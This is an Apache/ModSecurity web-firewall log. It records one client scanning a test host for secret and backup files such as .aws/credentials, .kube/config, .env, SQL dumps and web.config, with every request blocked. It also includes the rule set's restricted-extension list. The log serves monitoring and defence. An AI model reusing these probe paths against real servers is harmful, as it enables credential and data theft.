[Wed Jan 15 22:36:37.509234 2025] [:error] [pid 496994] [client 213.232.87.228:38677] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4gqZVGvN_7u0pQk47_MqgAAAAM"]
[Wed Jan 15 22:36:37.509544 2025] [:error] [pid 496994] [client 213.232.87.228:38677] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4gqZVGvN_7u0pQk47_MqgAAAAM"]
[Wed Jan 15 22:36:37.509723 2025] [:error] [pid 496994] [client 213.232.87.228:38677] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4gqZVGvN_7u0pQk47_MqgAAAAM"]
[Wed Jan 15 22:36:37.591215 2025] [:error] [pid 497000] [client 213.232.87.228:30481] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4gqZQLOlDfhLeCVl2z0xwAAAAc"]
[Wed Jan 15 22:36:37.591616 2025] [:error] [pid 497000] [client 213.232.87.228:30481] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4gqZQLOlDfhLeCVl2z0xwAAAAc"]
[Wed Jan 15 22:36:37.591855 2025] [:error] [pid 497000] [client 213.232.87.228:30481] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4gqZQLOlDfhLeCVl2z0xwAAAAc"]
[Wed Jan 15 22:36:37.654576 2025] [authz_core:error] [pid 489190] [client 213.232.87.228:24227] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Jan 15 22:36:37.920218 2025] [:error] [pid 489190] [client 213.232.87.228:57557] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4gqZfGQNR7qDEtyIGfFsQAAAAE"]
[Wed Jan 15 22:36:37.921043 2025] [:error] [pid 489190] [client 213.232.87.228:57557] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4gqZfGQNR7qDEtyIGfFsQAAAAE"]
[Wed Jan 15 22:36:37.921511 2025] [:error] [pid 489190] [client 213.232.87.228:57557] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4gqZfGQNR7qDEtyIGfFsQAAAAE"]
[Wed Jan 15 22:36:38.234147 2025] [:error] [pid 497000] [client 213.232.87.228:13083] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4gqZgLOlDfhLeCVl2z0yQAAAAc"]
[Wed Jan 15 22:36:38.234453 2025] [:error] [pid 497000] [client 213.232.87.228:13083] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4gqZgLOlDfhLeCVl2z0yQAAAAc"]
[Wed Jan 15 22:36:38.234627 2025] [:error] [pid 497000] [client 213.232.87.228:13083] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4gqZgLOlDfhLeCVl2z0yQAAAAc"]
[Wed Jan 15 22:36:38.313956 2025] [:error] [pid 497008] [client 213.232.87.228:6861] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4gqZijvXIXhwCuGqkvbWAAAAA8"]
[Wed Jan 15 22:36:38.314299 2025] [:error] [pid 497008] [client 213.232.87.228:6861] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4gqZijvXIXhwCuGqkvbWAAAAA8"]
[Wed Jan 15 22:36:38.314474 2025] [:error] [pid 497008] [client 213.232.87.228:6861] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4gqZijvXIXhwCuGqkvbWAAAAA8"]
[Wed Jan 15 22:36:38.445886 2025] [:error] [pid 497028] [client 213.232.87.228:26919] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4gqZvJeVH8YRQo4w54HCAAAAAg"]
[Wed Jan 15 22:36:38.446125 2025] [:error] [pid 497028] [client 213.232.87.228:26919] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4gqZvJeVH8YRQo4w54HCAAAAAg"]
[Wed Jan 15 22:36:38.446303 2025] [:error] [pid 497028] [client 213.232.87.228:26919] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4gqZvJeVH8YRQo4w54HCAAAAAg"]
[Wed Jan 15 22:36:38.448287 2025] [:error] [pid 496994] [client 213.232.87.228:29963] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4gqZlGvN_7u0pQk47_MrgAAAAM"]
[Wed Jan 15 22:36:38.448508 2025] [:error] [pid 496994] [client 213.232.87.228:29963] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4gqZlGvN_7u0pQk47_MrgAAAAM"]
[Wed Jan 15 22:36:38.448679 2025] [:error] [pid 496994] [client 213.232.87.228:29963] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4gqZlGvN_7u0pQk47_MrgAAAAM"]
[Wed Jan 15 22:36:38.489244 2025] [:error] [pid 497008] [client 213.232.87.228:5685] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4gqZijvXIXhwCuGqkvbWQAAAA8"]
[Wed Jan 15 22:36:38.489465 2025] [:error] [pid 497008] [client 213.232.87.228:5685] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4gqZijvXIXhwCuGqkvbWQAAAA8"]
[Wed Jan 15 22:36:38.489663 2025] [:error] [pid 497008] [client 213.232.87.228:5685] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4gqZijvXIXhwCuGqkvbWQAAAA8"]
[Wed Jan 15 22:36:38.530158 2025] [:error] [pid 496999] [client 213.232.87.228:12889] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4gqZqmdLlLWk7rgxcDmhgAAAAU"]
[Wed Jan 15 22:36:38.530412 2025] [:error] [pid 496999] [client 213.232.87.228:12889] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4gqZqmdLlLWk7rgxcDmhgAAAAU"]
[Wed Jan 15 22:36:38.530578 2025] [:error] [pid 496999] [client 213.232.87.228:12889] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4gqZqmdLlLWk7rgxcDmhgAAAAU"]
[Wed Jan 15 22:36:38.534824 2025] [:error] [pid 497027] [client 213.232.87.228:59443] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4gqZrIneUQjChqCfZ92EAAAAAQ"]
[Wed Jan 15 22:36:38.535029 2025] [:error] [pid 497027] [client 213.232.87.228:59443] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4gqZrIneUQjChqCfZ92EAAAAAQ"]
[Wed Jan 15 22:36:38.535291 2025] [:error] [pid 497027] [client 213.232.87.228:59443] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4gqZrIneUQjChqCfZ92EAAAAAQ"]
[Wed Jan 15 22:36:38.535531 2025] [:error] [pid 497027] [client 213.232.87.228:59443] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4gqZrIneUQjChqCfZ92EAAAAAQ"]
[Wed Jan 15 22:36:38.544922 2025] [:error] [pid 497007] [client 213.232.87.228:16841] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4gqZj65M2iul6LoJzY8qgAAAA4"]
[Wed Jan 15 22:36:38.545067 2025] [:error] [pid 497007] [client 213.232.87.228:16841] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4gqZj65M2iul6LoJzY8qgAAAA4"]
[Wed Jan 15 22:36:38.545261 2025] [:error] [pid 497007] [client 213.232.87.228:16841] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4gqZj65M2iul6LoJzY8qgAAAA4"]
[Wed Jan 15 22:36:38.545423 2025] [:error] [pid 497007] [client 213.232.87.228:16841] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4gqZj65M2iul6LoJzY8qgAAAA4"]
